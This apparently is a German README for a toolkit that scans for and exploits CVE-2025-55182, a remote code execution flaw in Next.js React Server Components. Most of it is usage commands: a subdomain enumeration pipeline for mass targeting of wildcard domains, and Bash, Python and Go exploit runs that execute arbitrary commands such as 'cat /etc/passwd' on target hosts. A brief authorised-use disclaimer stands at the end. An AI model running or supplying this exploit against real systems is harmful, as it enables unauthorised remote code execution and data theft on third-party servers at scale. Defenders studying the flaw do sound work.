
Mehrsprachiger Scanner für CVE-2025-55182 (RCE) in Next.js React Server Components, mit Einzel-/Massen-Scanmodi und integriertem Bug-Bounty-Reconnaissance-Workflow.
Ein umfassendes Toolkit zur Erkennung und Ausnutzung von CVE-2025-55182, einer kritischen Remote-Code-Ausführungsschwachstelle in Next.js-Anwendungen, die React Server Components verwenden.
Dieses Repository enthält einen einheitlichen Bash-Scanner (Einzel- und Massenmodus), Python/Go-Implementierungen und einen Bug-Bounty-Aufklärungs-Workflow.

Für die Massenjagd auf Wildcard-Domains verwenden Sie diese Pipeline, um Ziele vor dem Scannen zu filtern:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
Das Skript scanner.sh unterstützt Einzelziel-Scans und Massen-Scans aus einer Dateiliste.
chmod +x scanner.sh
Am besten geeignet zur Überprüfung eines bestimmten Ziels mit ausführlicher Ausgabe.
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Scannt effizient eine Liste von URLs und speichert verwundbare Hosts in einer Datei.
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
Verwenden Sie diese Version, wenn Probleme mit dem Bash-Escaping von Sonderzeichen auftreten.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Hohe Leistung, minimale Abhängigkeiten.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Dieses Tool dient ausschließlich zu Bildungszwecken und autorisierten Sicherheitstests. Eine unbefugte Nutzung ist strengstens illegal. Der Entwickler übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
NVD CVE-Detail: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
React-Sicherheitshinweis (React Server Components-Schwachstelle): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
ProjectDiscovery Nuclei-Vorlage: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Beschreibung |
|---|
-d, --domain | Einzelziel-URL |
-l, --list | Datei mit einer Liste von URLs |
-c, --command | Auszuführender Befehl (Standard: id) |
-o, --output | Ausgabedatei für verwundbare Hosts (Standard: vulnerable_hosts.txt) |